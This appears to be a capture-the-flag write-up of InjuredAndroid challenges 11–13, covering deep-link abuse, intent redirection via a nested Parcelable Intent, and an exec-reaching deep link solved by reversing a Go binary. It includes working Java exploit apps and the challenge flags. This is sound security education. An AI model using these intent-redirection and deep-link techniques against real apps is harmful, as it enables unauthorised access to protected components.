
Android Security Challenge: InjuredAndroid Part III (Challenge 11 - 13) (day 95) (~˘▾˘)~


This is the third part of the InjuredAndroid security challenge series by b3nac. In the second post we saw how a misconfigured AWS S3 bucket and Firebase database can leak information from the app, and how a Unicode handling bug let us bypass a check in the application.

In this post I'm going to show you how to solve the last three challenges. Without further ado, let's get into it.

Challenge 11:

To finish this challenge you need some knowledge of how deep links work. So what is a deep link?

It is just an ordinary URL, except that instead of navigating to a website using the http:// or https:// scheme it uses its own URL scheme to take the user directly to specific content or a resource inside the app.

This is one of the examples of a deep link on Android (taken from the Android developer documentation):


<activity
    android:name="com.example.android.GizmosActivity"
    android:label="@string/title_gizmos" >
    <intent-filter android:label="@string/filter_view_http_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "http://www.example.com/gizmos" -->
        <data android:scheme="http"
              android:host="www.example.com"
              android:pathPrefix="/gizmos" />
        <!-- note that the leading "/" is required for pathPrefix -->
    </intent-filter>
    <intent-filter android:label="@string/filter_view_example_gizmos">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <!-- Accepts URIs that begin with "example://gizmos" -->
        <data android:scheme="example"
              android:host="gizmos" />
    </intent-filter>
</activity>

A deep link is declared inside an intent-filter element: the developer specifies the scheme with the android:scheme attribute and the host with the android:host attribute (optionally narrowing further with android:pathPrefix). As the example shows, the scheme name and path are entirely up to the developer. Note the two categories as well: DEFAULT, so the activity can receive implicit intents, and BROWSABLE, so the link can be opened from a web browser.

If we look into the AndroidManifest.xml file we can see the deep-link declaration for the challenge 11 activity.



So in order to invoke that activity component, we need to send a VIEW intent whose data URI starts with the prefix "flag11://". We can send the URI from the command line with the adb `am start` command, as shown in the figure below.




But in order to finish this challenge we need to enter the flag, and by looking at the source code we can see that the flag is written to the debug log, so we can read it with logcat.





We got the 11th flag :)

11th flag => HIIMASTRING

The second way to get the flag, according to the walkthrough, is through the binary called "menu": running it prints the flag.



Challenge 12:

In order to finish this challenge you need to craft your own exploit app using Android Studio.



Looking at the MainActivity class that is responsible for launching the challenge 12 class, we can see that we need to go through another, exported activity to reach our target, FlagTwelveProtectedActivity, because that activity itself is not exported.



From the information above it is pretty clear that we need to use the ExportedProtectedIntent activity.



Looking at the source code, we need to pass a Parcelable inside the intent under the extra key "access_protected_component". This extra is then used by the exported activity to start the protected activity component.

Parcelable is Android's own serialization interface (similar in purpose to Java's Serializable, but not an implementation of it), and Intent implements it, so a whole Intent object can be passed as an extra inside another Intent.

Once we pass the right intent, it turns out that we also need to put one more extra, called "totally_secure", in the nested intent, and its value must contain the https:// scheme.



So how do we do this?



Pretty simple! First, create an Intent object that targets the FlagTwelveProtectedActivity class and put the "totally_secure" extra on it; then create another Intent object that carries the previously crafted intent to ExportedProtectedIntent, as in the figure above.

Run the code and you pass this level (no flag for this one!).
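The nested-intent exploit described above, written out as an added example (this is not the post's or b3nac's code). The package name and the fully qualified class names are assumptions and must be confirmed against the decompiled AndroidManifest.xml; the https:// URL is an arbitrary value that satisfies the prefix check the post describes.

```java
package com.example.injuredexploit; // hypothetical attacker app package, not part of InjuredAndroid

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;

/**
 * Added example: an attacker app that reaches the unexported
 * FlagTwelveProtectedActivity by handing a nested Intent to the exported
 * ExportedProtectedIntent activity, which starts it with the victim app's own
 * identity (so the android:exported="false" restriction no longer applies).
 */
public class ExploitTwelveActivity extends Activity {

    // ASSUMPTION: the victim package and class names; verify them in the manifest.
    private static final String TARGET_PKG = "b3nac.injuredandroid";
    private static final String PROXY_ACTIVITY = TARGET_PKG + ".ExportedProtectedIntent";
    private static final String PROTECTED_ACTIVITY = TARGET_PKG + ".FlagTwelveProtectedActivity";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        startActivity(buildExploit());
        finish();
    }

    /** Builds the outer intent; kept separate so it can be inspected before sending. */
    static Intent buildExploit() {
        // Inner intent: the component we cannot start directly from our own app.
        // The post says the check only wants an https:// value under "totally_secure".
        Intent inner = new Intent();
        inner.setComponent(new ComponentName(TARGET_PKG, PROTECTED_ACTIVITY));
        inner.putExtra("totally_secure", "https://example.com/"); // any https:// URL (assumed)

        // Outer intent: delivered to the exported proxy activity, which reads the
        // Parcelable stored under "access_protected_component" and calls startActivity on it.
        Intent outer = new Intent();
        outer.setComponent(new ComponentName(TARGET_PKG, PROXY_ACTIVITY));
        outer.putExtra("access_protected_component", inner); // Intent implements Parcelable
        return outer;
    }
}
```

Install this app next to InjuredAndroid and launch it; the outer intent lands in ExportedProtectedIntent, which forwards the inner one. From a defender's point of view, an exported activity that calls startActivity on an Intent it received from its caller is an intent-redirection sink: the fix is to not forward caller-supplied intents at all, or at least to reject any nested intent whose component is not one the proxy explicitly expects.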

Challenge 13:

The last challenge involves a little bit of reverse engineering and an RCE-style exploit.





Looking at the manifest file we can see that the activity again needs to be invoked through a deep link, but this time a host is specified as well, so the URI looks like "flag13://rce".



Looking at the source code above, when the activity is started it first calls the copyAssets() function, and as you can see we need to pass three query parameters, binary, param and combined, along with the deep link. To pass this level we need to supply the combined parameter with the right input.

The binary and param parameters are used to call the Runtime exec function, which lets us execute a program, but execution is limited to the files directory inside the application's internal storage.


Let's take a look at the copyAssets() function first.


As the name implies, it copies the contents of the assets folder, and the destination is the same "files" directory from which the program named by the binary and param parameters is executed.

Looking at the application, there is only one file, named "narnia", inside the assets folder, and it turns out to be a Go executable.



Let's try to reverse engineer it using Ghidra. If you have never reverse engineered a Go binary you will feel overwhelmed by the result, but all you need to do is focus on the main.main function, since this is the equivalent of the main() function in C.


When you look at the first few lines of the code there is a string comparison:



Let's try to decode the hex string. Remember that the immediate values the decompiler shows are still in little-endian byte order, so we need to reverse the bytes to make the string readable.
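Reversing the bytes by hand is error-prone once the string spans several 8-byte immediates, which is how Go compares longer strings. The helper below is an added example (not from the post) that turns such immediates back into text; the sample values are constructed for the demonstration and are not the constants from the narnia binary.

```java
import java.util.Locale;

/**
 * Added example: decode the 64-bit immediates that Ghidra shows in a Go string
 * comparison back into the string the binary compares against. Each immediate
 * holds up to 8 bytes of the string with the first character in the least
 * significant byte (little-endian), so we read bytes from the low end upwards.
 */
public final class LittleEndianStrings {

    /** Decodes one immediate; a short tail chunk has zero high bytes, which we stop at. */
    static String decodeImmediate(long value) {
        StringBuilder sb = new StringBuilder(8);
        for (int i = 0; i < 8; i++) {
            int b = (int) ((value >>> (8 * i)) & 0xFF);
            if (b == 0) {
                break;
            }
            sb.append((char) b);
        }
        return sb.toString();
    }

    /** Accepts the hex text as copied from the decompiler, e.g. "0x7365735f6e65706f". */
    static String decodeHex(String hex) {
        String h = hex.toLowerCase(Locale.ROOT);
        if (h.startsWith("0x")) {
            h = h.substring(2);
        }
        return decodeImmediate(Long.parseUnsignedLong(h, 16));
    }

    /** Go compares long strings 8 bytes at a time; pass the immediates in program order. */
    static String decodeChunks(String... hexImmediates) {
        StringBuilder sb = new StringBuilder();
        for (String h : hexImmediates) {
            sb.append(decodeHex(h));
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Constructed sample (not a value from narnia): "open_sesame" as two chunks.
        // "open_ses" -> bytes 6f 70 65 6e 5f 73 65 73 -> immediate 0x7365735f6e65706f
        // "ame"      -> bytes 61 6d 65                -> immediate 0x656d61
        System.out.println(decodeChunks("0x7365735f6e65706f", "0x656d61")); // open_sesame
    }
}
```

Compile with `javac LittleEndianStrings.java && java LittleEndianStrings`. If the decompiler shows the comparison as a sequence of 4-byte or 2-byte compares instead, the same byte-order rule applies, only with fewer bytes per immediate.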


OK, let's try to input this string as the parameter; the result shows several options that we can use.



From the looks of it, it is pretty clear that we need to use testOne, testTwo and testThree together.



Combining these three outputs we get "Treasure_Planet", and I think this is the secret string that we need to supply in the combined parameter.

From all of this information, let's create the exploit.



Supplying parameters in a deep link works the same way as query parameters in a normal http:// URL, and once I run the exploit I pass the challenge. Cool!

13th flag => Treasure_Planet
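For challenge 11 the post fires the deep link from adb, and for challenge 13 from an exploit app. As an added example (not the post's or b3nac's code), the attacker app below fires both deep links from Java, which is the realistic threat model: any installed app can send a VIEW intent with a custom scheme, so everything an activity reads from its deep link is untrusted input. The package name is hypothetical; the "binary" value is assumed to be the narnia asset the post describes, and the "param" value is a placeholder, because the post shows the decoded string only in a figure.

```java
package com.example.injuredexploit; // hypothetical attacker app package, not part of InjuredAndroid

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Added example: fire the custom-scheme deep links of challenges 11 and 13.
 * Uri.Builder is used for the query so each value is percent-encoded; a value
 * containing '&', '=' or '/' therefore cannot split or corrupt the query.
 */
public class DeepLinkExploitActivity extends Activity {

    // ASSUMPTION: the asset copied by copyAssets() is the Go binary "narnia".
    private static final String NARNIA_BINARY = "narnia";
    // PLACEHOLDER: the string recovered from the Go binary's comparison in Ghidra;
    // the post shows it only in a figure, so it is not reproduced here.
    private static final String NARNIA_PARAM = "<decoded-string-from-ghidra>";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        startActivity(viewIntent(challenge11Uri()));
        startActivity(viewIntent(challenge13Uri(NARNIA_BINARY, NARNIA_PARAM, "Treasure_Planet")));
        finish();
    }

    /** Challenge 11: the post only needs the "flag11://" prefix, no host or query. */
    static Uri challenge11Uri() {
        return Uri.parse("flag11://");
    }

    /** Challenge 13: scheme "flag13", host "rce", plus the three query parameters. */
    static Uri challenge13Uri(String binary, String param, String combined) {
        Map<String, String> query = new LinkedHashMap<>();
        query.put("binary", binary);
        query.put("param", param);
        query.put("combined", combined);
        return buildDeepLink("flag13", "rce", query);
    }

    /** Generic scheme://host?k=v&... builder with proper encoding of every value. */
    static Uri buildDeepLink(String scheme, String host, Map<String, String> query) {
        Uri.Builder b = new Uri.Builder().scheme(scheme).authority(host);
        for (Map.Entry<String, String> e : query.entrySet()) {
            b.appendQueryParameter(e.getKey(), e.getValue());
        }
        return b.build();
    }

    /** The same implicit intent a browser would send for the link. */
    static Intent viewIntent(Uri uri) {
        Intent i = new Intent(Intent.ACTION_VIEW, uri);
        i.addCategory(Intent.CATEGORY_BROWSABLE);
        return i;
    }
}
```

The command-line equivalent, which the post's figures use, is `adb shell am start -a android.intent.action.VIEW -d "<uri>"`; quote the URI, because `&` in the query would otherwise be interpreted by the device shell. On the defending side, the activity behind flag13://rce takes the executable name and its argument straight from the query string, which is exactly the pattern to look for when auditing deep-link handlers: parameters that end up in exec-style calls, file paths or WebView loads.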

Conclusion:

This vulnerable application taught us about a variety of weaknesses that can affect Android applications, and it is a really good exercise for anyone who wants to dive deep into Android bug bounties. I would say the creator of this challenge, b3nac, did a really good job and I hope he will create more masterpieces like this in the near future.



